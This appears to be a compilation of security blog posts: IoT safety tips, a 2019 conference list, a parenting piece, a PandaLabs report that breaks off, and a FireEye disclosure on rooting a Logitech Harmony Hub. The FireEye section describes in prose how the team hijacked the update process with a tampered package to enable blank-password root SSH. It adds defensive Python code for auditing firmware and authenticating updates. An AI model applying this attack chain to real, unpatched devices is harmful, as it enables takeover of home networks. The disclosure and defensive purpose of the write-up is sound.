      Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email that made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open it. TV Licensing warned it never asks for this sort of information over email.

January saw further political pressure and media coverage about the threat posed to UK national security by Chinese telecoms giant Huawei; I'll cover all that in a separate blog post.



      How to Protect Three Common IoT Devices in 2019

      It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead, and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.

      Routers

      Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.

      Gaming Systems

Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involving the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. By exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes. This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be wary of what you click on.

      Voice Tech

In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely because of what we connect them to for convenience: delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information. Because voice-controlled devices are frequently distributed without proper security protocols in place, they are the perfect vehicle for executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.

      While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:

• Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
• Pay attention to the news. With more and more information coming out about vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
• Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as it comes out of the box. By changing the factory settings you’re instantly upgrading your device’s security.
• Use best practices for linked accounts. For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
• Set up a separate IoT network. Consider setting up a second network for your IoT devices that doesn’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
• Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a firewall is included to ensure that your devices are protected.
• Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with McAfee Gamer Security, Beta, it’s free!

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and “Like” us on Facebook.

      The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

      Cyber Security Conferences to Attend in 2019

A list of Cyber and Information Security conferences to consider attending in 2019. Conferences are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but also to network with industry-leading security professionals and like-minded enthusiasts, to share ideas, expand your own knowledge, and even to make good friends.

      JANUARY 2019

      SANS Cyber Threat Intelligence Summit
      Monday 21st & Tuesday 22nd January 2019
      Renaissance Arlington Capital View Hotel, VA, USA
      https://www.sans.org/event/cyber-threat-intelligence-summit-2018


      AppSec California 2019 (OWASP)
      Tuesday 22nd & Wednesday 23rd January 2019
      Annenberg Community Beach House, Santa Monica, USA
      https://2019.appseccalifornia.org/


      PCI London
      Thursday 24th January 2019
      Park Plaza Victoria Hotel, London, UK
      https://akjassociates.com/event/pcilondon

      The Future of Cyber Security Manchester
      Thursday 24th January 2019
      Bridgewater Hall, Manchester, UK
      https://cybermanchester.events/

BSides Leeds
Friday 25th January 2019
Cloth Hall Court, Leeds, UK

FEBRUARY 2019

Cyber Security for Industrial Control Systems
Thursday 7th & Friday 8th February 2019
      Savoy Place, London, UK
      https://events.theiet.org/cyber-ics/index.cfm

      NOORD InfoSec Dialogue UK
      Tuesday 26th & Wednesday 27th February 2019
      The Bull-Gerrards Cross, Buckinghamshire, UK

      MARCH 2019
      RSA Conference
      Monday 4th to Friday 8th March 2019
Moscone Center, San Francisco, USA
      https://www.rsaconference.com/events/us19

      17th Annual e-Crime & Cybersecurity Congress
      Tuesday 5th & Wednesday 6th March 2019
      Park Plaza Victoria

      Security & Counter Terror Expo
      Tuesday 5th & Wednesday 6th March 2019
      Olympia, London, UK
      https://www.counterterrorexpo.com/


      ISF UK Spring Conference
      Wednesday 6th & Thursday 7th March 2019
      Regent Park, London, UK
      https://www.securityforum.org/events/chapter-meetings/uk-spring-conference-london/


      BSidesSF
      Sunday 3rd and Monday 4th March 2019
      City View at Metreon, San Francisco, USA
      https://bsidessf.org/

      Cloud and Cyber Security Expo
      Tuesday 12th to Wednesday 13 March 2019
ExCel, London, UK
      https://www.cloudsecurityexpo.com/

      APRIL 2019

      (ISC)2 Secure Summit EMEA
      Monday 15th & Tuesday 16th April 2019
      World Forum, The Hague, Netherlands
      https://web.cvent.com/event/df893e22-97be-4b33-8d9e-63dadf28e58c/summary

      Cyber Security Manchester
      Wednesday 3rd & Thursday 4th April 2019
      Manchester Central, Manchester, UK
      https://cybermanchester.events/

      BSides Scotland 2019
      Tuesday 23rd April 2019
      Royal College of Physicians, Edinburgh, UK
      https://www.contextis.com/en/events/bsides-scotland-2019


      CyberUK 2019
      Wednesday 24th & Thursday 25th April 2019
      Scottish Event Campus, Glasgow, UK
      https://www.ncsc.gov.uk/information/cyberuk-2019

      Cyber Security & Cloud Expo Global 2019
      Thursday 25th and Friday 29th April 2019
      Olympia, London, UK
      https://www.cybersecuritycloudexpo.com/global/


      JUNE 2019
      Infosecurity Europe 2019
      Tuesday 4th to Thursday 6th June 2019
Olympia, London, UK
      https://www.infosecurityeurope.com/

BSides London
Thursday 6th June 2019
      ILEC Conference Centre, London, UK
      https://www.securitybsides.org.uk/

      Blockchain International Show
      Thursday 6th and Friday 7th June 2019
      ExCel Exhibition & Conference Centre, London, UK
      https://bisshow.com/

      Hack in Paris 2019
      Sunday 16th to Friday 20th June 2019
      Maison de la Chimie, Paris, France
      https://hackinparis.com/

      UK CISO Executive Summit
      Wednesday 19th June 2019
      Hilton Park Lane, London, UK
      https://www.evanta.com/ciso/summits/uk#overview

      Cyber Security & Cloud Expo Europe 2019
      Thursday 19th and Friday 20th June 2019
      RIA, Amsterdam, Netherlands
      https://cybersecuritycloudexpo.com/europe/

      Gartner Security and Risk Management Summit
      Monday 17th to Thursday 20th June 2019
      National Harbor, MD, USA
      https://www.gartner.com/en/conferences/na/security-risk-management-us

      European Maritime Cyber Risk Management Summit
      Tuesday 25th June 2019
      Norton Rose Fulbright, London, UK


      AUGUST 2019
      Black Hat USA
      Saturday 3rd to Thursday 8th August 2019
      Mandalay Bay, Las Vegas, NV, USA
      https://www.blackhat.com/upcoming.html

DEF CON 27
Thursday 8th to Sunday 11th August 2019
      Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA
      https://www.defcon.org/


      SEPTEMBER 2019
      44Con
      Wednesday 11th to Friday 13th September 2019
      ILEC Conference Centre, London, UK
      https://44con.com/

      2019 PCI SSC North America Community Meeting
      Tuesday 17th to Thursday 19th September 2019
      Vancouver, BC, Canada
      https://www.pcisecuritystandards.org/about_us/events

      OCTOBER 2019

      Hacker Halted
      Thursday 10th & Friday 11th October 2019
      Atlanta, Georgia, USA
      https://www.hackerhalted.com/

      BruCON
      Thursday 10th & Friday 11th October 2019
      Aula, Gent, Belgium
      https://www.brucon.org/2019/

EuroCACS/CSX (ISACA) 2019
Wednesday 16th to Friday 19th October 2019
      Palexpo Convention Centre, Geneva, Switzerland
      https://conferences.isaca.org/euro-cacs-csx-2019

      6th Annual Industrial Control Cyber Security Europe Conference
      Tuesday 29th and Wednesday 30th October 2019
      Copthorne Tara, Kensington, London, UK
      https://www.cybersenate.com/new-events/2018/11/13/6th-annual-industrial-control-cyber-security-europe-conference

2019 PCI SSC Europe Community Meeting
Tuesday 22nd to Thursday 24th October 2019
      Dublin, Ireland
      https://www.pcisecuritystandards.org/about_us/events

      ISF 30th Annual World Congress
      Saturday 26th to Tuesday 29th October 2019
      Convention Centre Dublin, Dublin, Ireland



      NOVEMBER 2019
Cyber Security & Cloud Expo North America 2019
      Wednesday 13th and Thursday 14th November 2019
      Santa Clara Convention Centre, Silicon Valley, USA
      https://www.cybersecuritycloudexpo.com/northamerica/

      DevSecCon London 
      Thursday 14th & Friday 15th November 2019
      CodeNode, London, UK


      Cyber Security Summit 2019
      Wednesday 20th November 2019
      QEII Centre, London, UK
      https://cybersecuritysummit.co.uk/

2019 PCI SSC Asia-Pacific Community Meeting
Wednesday 20th and Thursday 21st November 2019
      Melbourne, Australia
      https://www.pcisecuritystandards.org/about_us/events

      DeepSec
      Thursday 20th to Saturday 30th November 2019
      The Imperial Riding School Vienna, Austria
      https://deepsec.net/

      Post in the comments about any cyber & information security themed conferences or events you recommend.

      The #1 Gift Parents Can Give Their Kids This Christmas

You won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

      Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

      If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to its hiding place and reconnect to the moment.

      This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

      Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

      Here are a few ideas to inspire you forward:

1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar, so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.
      2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
      3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
      4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
      5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

      Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

      The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

      Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

      Introduction

      FireEye’s Mandiant Red Team recently discovered vulnerabilities present on the Logitech Harmony Hub Internet of Things (IoT) device that could potentially be exploited, resulting in root access to the device via SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploitation of these vulnerabilities from the local network could allow an attacker to control the devices linked to the Hub as well as use the Hub as an execution space to attack other devices on the local network. As the Harmony Hub device list includes support for devices such as smart locks, smart thermostats as well as other smart home devices, these vulnerabilities present a very high risk to the users.

      FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

      The Red Team discovered the following vulnerabilities:

      • Improper certificate validation
      • Insecure update process
      • Developer debugging symbols left in the production firmware image
      • Blank root user password

      The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

      Device Analysis

      Device Preparation

      Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


      Figure 1: Initial boot log output from UART interface

      After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

      Firmware Recovery and Extraction

      The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

      Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


      Figure 2: A query to force the Harmony Hub to check for updates

      The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


      Figure 3: The Harmony Hub checks for updates to its firmware


      Figure 4: The server sends a response with a URL for the updated firmware

We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with lzma, a common format for embedded devices. However, vendors often use old versions of squashfs-tools that are incompatible with more recent squashfs-tools builds. We used the unsquashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


      Figure 5: Using firmware-mod-kit to extract the filesystem

      With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


      Figure 6: Unstripped Linux kernel objects on the filesystem

      Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


      Figure 7: /etc/passwd shows no password is configured for the root user

      We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


      Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present
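The three filesystem findings above (a blank root password in /etc/passwd, a marker file that switches on an SSH server at boot, unstripped kernel objects) are all things a vendor or auditor can check mechanically on an extracted image before it ships. The script below is an added example written for this post, not FireEye's or Logitech's code: it walks an unpacked root filesystem and reports accounts that can log in with no password (empty field in /etc/passwd, or an empty hash in /etc/shadow), the presence of the /etc/tdeenable marker named in the post, and ELF objects that still carry a SHT_SYMTAB section, which is what a stripped binary loses. The sample filesystem it audits is constructed inline in a temporary directory; the file contents and the module path are made up for the demonstration, and the tiny ELF images are fixtures rather than real binaries.

```python
"""Audit an extracted firmware root filesystem (added example, not vendor code).

Reports: accounts with no password, leftover debug marker files, and ELF
objects shipped with their full symbol table. The filesystem inspected by
demo() is constructed inline; only /etc/tdeenable comes from the post.
"""
import os
import struct
import tempfile

# Files whose mere presence enables a debug service at boot (from the post).
DEBUG_MARKERS = ["etc/tdeenable"]
SHT_SYMTAB = 2  # section type of the full symbol table; gone once stripped


def accounts_without_password(passwd_text, shadow_text=""):
    """Return account names that can log in with no password.

    An empty second field in /etc/passwd means no password at all; an 'x'
    defers to /etc/shadow, where an empty hash field also means none.
    """
    shadow = {}
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2:
            shadow[parts[0]] = parts[1]
    weak = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7 or not parts[0]:
            continue  # blank or malformed entry
        user, field = parts[0], parts[1]
        if field == "" or (field == "x" and shadow.get(user, "!") == ""):
            weak.append(user)
    return weak


def elf_has_symtab(path):
    """True if the file is an ELF object that still has a SHT_SYMTAB section."""
    with open(path, "rb") as f:
        data = f.read()
    if len(data) < 64 or data[:4] != b"\x7fELF":
        return False
    fmt = "<" if data[5] == 1 else ">"  # EI_DATA: 1 little endian, 2 big endian
    if data[4] == 1:    # ELFCLASS32: e_shoff at 0x20, e_shentsize/e_shnum at 0x2E
        (e_shoff,) = struct.unpack_from(fmt + "I", data, 0x20)
        e_shentsize, e_shnum = struct.unpack_from(fmt + "HH", data, 0x2E)
    elif data[4] == 2:  # ELFCLASS64: e_shoff at 0x28, e_shentsize/e_shnum at 0x3A
        (e_shoff,) = struct.unpack_from(fmt + "Q", data, 0x28)
        e_shentsize, e_shnum = struct.unpack_from(fmt + "HH", data, 0x3A)
    else:
        return False
    for i in range(e_shnum):
        off = e_shoff + i * e_shentsize
        if off + 8 > len(data):
            return False  # truncated section header table
        (sh_type,) = struct.unpack_from(fmt + "I", data, off + 4)  # sh_type follows sh_name
        if sh_type == SHT_SYMTAB:
            return True
    return False


def _read(root, rel):
    try:
        with open(os.path.join(root, rel), encoding="utf-8") as f:
            return f.read()
    except FileNotFoundError:
        return ""


def audit_rootfs(root):
    """Walk an extracted root filesystem and return sorted finding strings."""
    findings = []
    for user in accounts_without_password(_read(root, "etc/passwd"), _read(root, "etc/shadow")):
        findings.append(f"empty password for account '{user}'")
    for marker in DEBUG_MARKERS:
        if os.path.exists(os.path.join(root, marker)):
            findings.append(f"debug marker present: /{marker}")
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if elf_has_symtab(path):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append(f"unstripped ELF object: /{rel}")
    return sorted(findings)


def build_minimal_elf(with_symtab):
    """Constructed fixture: a minimal ELF64 LE image with a section header table."""
    shnum = 2 if with_symtab else 1
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header = ident + struct.pack("<HHIQQQIHHHHHH", 1, 62, 1, 0, 0, 64, 0, 64, 0, 0, 64, shnum, 0)
    sections = b"\x00" * 64  # mandatory null section header
    if with_symtab:
        sections += struct.pack("<IIQQQQIIQQ", 1, SHT_SYMTAB, 0, 0, 0, 0, 0, 0, 0, 0)
    return header + sections


def demo():
    """Construct a sample root filesystem in a temp dir and audit it."""
    files = {  # constructed sample contents
        "etc/passwd": b"root::0:0:root:/root:/bin/sh\ndaemon:x:1:1:daemon:/usr/sbin:/bin/false\n",
        "etc/shadow": b"daemon:*:17000:0:99999:7:::\n",
        "etc/tdeenable": b"",
        "lib/modules/example.ko": build_minimal_elf(True),
        "bin/busybox": build_minimal_elf(False),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(content)
        return audit_rootfs(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point audit_rootfs() at the directory unsquashfs produced and it will flag the same three classes of finding on a real image; the SHT_SYMTAB check is a structural test of the section header table rather than a string search, so it also catches unstripped shared objects and daemons, not only kernel modules.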

      Hijacking Update Process

      During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or a URL to obtain information about updates’ additional software packages.


      Figure 9: The request to obtain a list of URL endpoints for various processes

      We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


      Figure 10: The modified JSON object member

      Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


      Figure 11: The JSON request object containing the current version of the “HEOS” package

      If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with an initial response containing information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


      Figure 12: The JSON response containing URLs for the software update

      We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


      Figure 13: The .pkg archive file hierarchy

      The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


      Figure 14: The contents of the manifest.json file

      The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


      Figure 15: The modified update.sh file

We created a new malicious archive with the appropriate .pkg extension, which was hosted on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2Uris response, we sent a modified response to point to this update. The Harmony Hub retrieved our malicious update package, and after rebooting the Harmony Hub, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


      Figure 16: The SSH interface was enabled after a reboot
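The update chain described above worked because the Hub trusted whatever manifest.json arrived and ran the installer it named, with nothing binding the package to the vendor. The example below is added for this post and is not Logitech's update client: it shows the verification a device should perform before touching a package's manifest. The whole archive (every member, name and length, in canonical order) is authenticated, the tag is checked in constant time before manifest.json is even parsed, and the installer member is required to be a plain entry of the archive rather than a path outside it. Because the standard library has no asymmetric signature primitive, the tag here is an HMAC-SHA256 under a constructed device key; a production design would instead sign the digest with a vendor private key and keep only the public key on the device, so that a compromised device cannot forge packages. The package layout (manifest.json with an installer member, update.sh) follows the post; the key name, the package.sig member and all contents are constructed.

```python
"""Authenticate an update package before trusting its manifest (added example,
not Logitech's code). HMAC-SHA256 under a device key stands in for a vendor
signature; everything else (member names, key, contents) is constructed."""
import hashlib
import hmac
import io
import json
import zipfile

# Constructed device key; a real device would hold a vendor public key instead.
DEVICE_KEY = b"example-provisioning-key-not-for-production"
TAG_MEMBER = "package.sig"  # archive member carrying the authentication tag


def canonical_digest(items):
    """SHA-256 over (name, length, content) of every member in sorted name order.

    Renaming, adding, removing or editing any member, manifest.json included,
    changes the digest, so one tag covers the whole archive.
    """
    h = hashlib.sha256()
    for name, data in sorted(items):
        h.update(name.encode() + b"\0" + len(data).to_bytes(8, "big") + data)
    return h.digest()


def build_package(members, key=DEVICE_KEY):
    """Vendor side: pack members into a .pkg ZIP and append the tag (none if key is None)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
        if key is not None:
            tag = hmac.new(key, canonical_digest(members.items()), hashlib.sha256).hexdigest()
            zf.writestr(TAG_MEMBER, tag)
    return buf.getvalue()


def verify_package(pkg_bytes, key=DEVICE_KEY):
    """Device side: return the manifest only if the package authenticates.

    Raises ValueError otherwise. Nothing in the archive is acted on, and no
    installer is run, until the tag has been checked.
    """
    with zipfile.ZipFile(io.BytesIO(pkg_bytes)) as zf:
        names = zf.namelist()
        if TAG_MEMBER not in names:
            raise ValueError("package is not signed")
        items = [(n, zf.read(n)) for n in names if n != TAG_MEMBER]
        expected = hmac.new(key, canonical_digest(items), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, zf.read(TAG_MEMBER).decode()):
            raise ValueError("package authentication failed")
    contents = dict(items)
    if "manifest.json" not in contents:
        raise ValueError("manifest.json missing")
    manifest = json.loads(contents["manifest.json"])
    installer = manifest.get("installer")
    if installer is not None:
        # The installer must be a plain member of the archive, never a path outside it.
        if installer.startswith("/") or ".." in installer.split("/") or installer not in contents:
            raise ValueError(f"installer path rejected: {installer!r}")
    return manifest


def tamper(pkg_bytes, name, new_data):
    """Test fixture: rewrite one member after signing, keeping the original tag."""
    src = zipfile.ZipFile(io.BytesIO(pkg_bytes))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as dst:
        for n in src.namelist():
            dst.writestr(n, new_data if n == name else src.read(n))
    return buf.getvalue()


def demo():
    """Build a genuine package and several bad ones; return what the verifier says."""
    members = {  # constructed package contents
        "manifest.json": json.dumps({"version": "1.2.3", "installer": "update.sh"}).encode(),
        "update.sh": b"#!/bin/sh\necho applying update\n",
    }
    pkg = build_package(members)
    results = {"genuine": verify_package(pkg)["version"]}
    cases = {
        "edited script": tamper(pkg, "update.sh", b"#!/bin/sh\necho tampered\n"),
        "edited manifest": tamper(pkg, "manifest.json", json.dumps({"installer": "other.sh"}).encode()),
        "unsigned": build_package(members, key=None),
        "bad installer path": build_package({**members, "manifest.json":
                                            json.dumps({"installer": "../etc/profile"}).encode()}),
    }
    for label, bad in cases.items():
        try:
            verify_package(bad)
            results[label] = "accepted"
        except ValueError as e:
            results[label] = str(e)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:20s} -> {outcome}")
```

The ordering inside verify_package() is the point: the archive is authenticated as a whole before manifest.json is parsed, so an attacker who can swap the download URL (as the post does via GetJson2Uris) can deliver a package but cannot get its installer executed. The path check is a separate defence for the case where the signing key itself is misused.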

      Conclusion

As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Because the Harmony Hub, like many IoT devices, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices in which we place our trust should be vigilant in removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

      "At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

If a malicious hacker had already gained access to a Hub user's network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

      As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

*Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, Harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

      The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report


Developments in cyber-crime, cyberwarfare and AI marked the first quarter of 2017, as indicated by the PandaLabs Q1 Report. The report by Panda Security’s malware research facility identifies prominent tactics, attack methods and shifts in the industry.

The cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and organisations like vDOS, an organisation specialising in DDoS attacks, indicate the professionalism of the cyber-crime industry. In Q1 we continued to see new and adapted attack methods such as RDPatcher, malware that PandaLabs detected while it was attempting to access the victim’s endpoint and prepare it for rental on the Dark Web.

      Politically motivated cyber-attacks

Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, cyberwarfare has become a popular tactic for enforcing political agendas. In Q4 of 2016, we saw some of the first high-profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity of the development is clear, as countries like Germany have now begun to develop cyber-command centres to monitor online activity; this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

      Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a smart TV using only a DVB-T signal.

      A perfect device for eavesdropping

